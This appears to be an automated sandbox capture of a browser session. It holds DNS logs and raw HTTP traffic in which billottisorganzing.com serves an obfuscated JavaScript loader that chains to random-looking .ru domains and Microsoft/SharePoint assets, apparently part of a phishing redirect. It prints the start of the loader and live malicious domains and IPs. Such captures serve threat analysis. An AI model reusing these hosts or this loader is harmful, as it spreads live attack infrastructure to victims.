                                                                                                            Dec 22, 2024 00:47:14.875648022 CET192.168.2.41.1.1.10xd16dStandard query (0)assets.onestore.ms65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:14.877001047 CET192.168.2.41.1.1.10x94b4Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:14.877115011 CET192.168.2.41.1.1.10x9fbbStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:17.825064898 CET192.168.2.41.1.1.10xddafStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:17.825193882 CET192.168.2.41.1.1.10xa9fStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:18.877615929 CET192.168.2.41.1.1.10xec02Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:18.877753019 CET192.168.2.41.1.1.10x1893Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:21.259191990 CET192.168.2.41.1.1.10xfdbfStandard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:21.259335041 CET192.168.2.41.1.1.10x20b2Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 22, 2024 00:46:31.859631062 CET1.1.1.1192.168.2.40xaecNo error (0)billottisorganzing.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.713422060 CET1.1.1.1192.168.2.40xb7d2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.713474989 CET1.1.1.1192.168.2.40x30c0No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.713474989 CET1.1.1.1192.168.2.40x30c0No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.715723991 CET1.1.1.1192.168.2.40xa4c8No error (0)billottisorganzing.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.614274025 CET1.1.1.1192.168.2.40x8885No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.614892006 CET1.1.1.1192.168.2.40x7dc2No error (0)www.google.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.925065994 CET1.1.1.1192.168.2.40x357fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.925504923 CET1.1.1.1192.168.2.40x696dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.925504923 CET1.1.1.1192.168.2.40x696dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:36.265450001 CET1.1.1.1192.168.2.40x8b0aNo error (0)tf6.jqugbctcds.ru104.21.24.112A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:36.265450001 CET1.1.1.1192.168.2.40x8b0aNo error (0)tf6.jqugbctcds.ru172.67.218.90A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:36.265722036 CET1.1.1.1192.168.2.40xc7cfNo error (0)tf6.jqugbctcds.ru65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860095024 CET1.1.1.1192.168.2.40x369No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860095024 CET1.1.1.1192.168.2.40x369No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860095024 CET1.1.1.1192.168.2.40x369No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860095024 CET1.1.1.1192.168.2.40x369No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860692024 CET1.1.1.1192.168.2.40x3aabNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860692024 CET1.1.1.1192.168.2.40x3aabNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860706091 CET1.1.1.1192.168.2.40x79dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860706091 CET1.1.1.1192.168.2.40x79dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860718966 CET1.1.1.1192.168.2.40xa120No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.860733032 CET1.1.1.1192.168.2.40x9e7eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:42.217550993 CET1.1.1.1192.168.2.40x3bb2No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:42.217550993 CET1.1.1.1192.168.2.40x3bb2No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:42.217550993 CET1.1.1.1192.168.2.40x3bb2No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:42.217550993 CET1.1.1.1192.168.2.40x3bb2No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.825810909 CET1.1.1.1192.168.2.40x2778No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.826397896 CET1.1.1.1192.168.2.40x9c78No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.826397896 CET1.1.1.1192.168.2.40x9c78No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.843452930 CET1.1.1.1192.168.2.40xa740No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.843472958 CET1.1.1.1192.168.2.40x9799No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.843472958 CET1.1.1.1192.168.2.40x9799No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:48.683626890 CET1.1.1.1192.168.2.40xbe54No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:03.985831022 CET1.1.1.1192.168.2.40xb5f8No error (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru172.67.181.220A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:03.985831022 CET1.1.1.1192.168.2.40xb5f8No error (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru104.21.18.132A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:03.986351967 CET1.1.1.1192.168.2.40x7667No error (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.504060030 CET1.1.1.1192.168.2.40x1b64No error (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.505275011 CET1.1.1.1192.168.2.40x9541No error (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru172.67.181.220A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.505275011 CET1.1.1.1192.168.2.40x9541No error (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru104.21.18.132A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.843835115 CET1.1.1.1192.168.2.40xe2e8No error (0)www.sharepoint.comsharepoint.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.843986034 CET1.1.1.1192.168.2.40xcad6No error (0)www.sharepoint.comsharepoint.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:15.036922932 CET1.1.1.1192.168.2.40x94b4No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:15.099175930 CET1.1.1.1192.168.2.40x9fbbNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:15.318912029 CET1.1.1.1192.168.2.40x62bdNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:15.473359108 CET1.1.1.1192.168.2.40xd16dNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:17.962007999 CET1.1.1.1192.168.2.40xddafNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:17.963052034 CET1.1.1.1192.168.2.40xa9fNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:19.280940056 CET1.1.1.1192.168.2.40x1893No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:19.281011105 CET1.1.1.1192.168.2.40xec02No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:21.397469044 CET1.1.1.1192.168.2.40xfdbfNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:21.397524118 CET1.1.1.1192.168.2.40x20b2No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            • billottisorganzing.com
                                                                                                            • cdnjs.cloudflare.com
                                                                                                            • tf6.jqugbctcds.ru
                                                                                                            • https:
                                                                                                              • code.jquery.com
                                                                                                              • challenges.cloudflare.com
                                                                                                              • 2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru
                                                                                                            • a.nel.cloudflare.com
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.44973769.49.245.1724435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:33 UTC657OUTGET /res444.php?2-68747470733a2f2f5446362e6a7175676263746364732e72752f307068312f-yewwood HTTP/1.1
                                                                                                            Host: billottisorganzing.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: script
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:33 UTC196INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:31 GMT
                                                                                                            Server: Apache
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Connection: close
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/javascript;charset=UTF-8
                                                                                                            2024-12-21 23:46:33 UTC1969INData Raw: 37 61 35 0d 0a 20 20 20 20 76 61 72 20 6d 46 71 56 48 4a 4b 75 43 4b 58 78 6d 68 4c 44 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 6d 46 71 56 48 4a 4b 75 43 4b 58 78 6d 68 4c 44 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 6d 46 71 56 48 4a 4b 75 43 4b 58 78 6d 68 4c 44 29 3b 0d 0a 6d 46 71 56 48 4a 4b 75 43 4b 58 78 6d 68 4c 44 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                            Data Ascii: 7a5 var mFqVHJKuCKXxmhLD = document.createElement("script");mFqVHJKuCKXxmhLD.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(mFqVHJKuCKXxmhLD);mFqVHJKuCKXxmhLD.onload=function()


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.449738104.17.24.144435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:34 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: script
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:35 UTC958INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:35 GMT
                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                            ETag: W/"5eb03e2d-bb78"
                                                                                                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                            Timing-Allow-Origin: *
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 165203
                                                                                                            Expires: Thu, 11 Dec 2025 23:46:35 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NMD2BBbcy0fFAESLvbfgmQqPRN94R4fB1rSF3tsf%2BST19aS4Ea3TKSoDfIa6LXbE40pyp8zfCwqcWd0xrTU86sK%2F3h6W3iV4EKOximtbZRiBzPuqgk1IuafuiO4iV0LltAA%2BZR0D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc09a0c1141ad-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:35 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                            Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                                            Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69
                                                                                                            Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73
                                                                                                            Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31
                                                                                                            Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b
                                                                                                            Data Ascii: [4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32
                                                                                                            Data Ascii: %4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
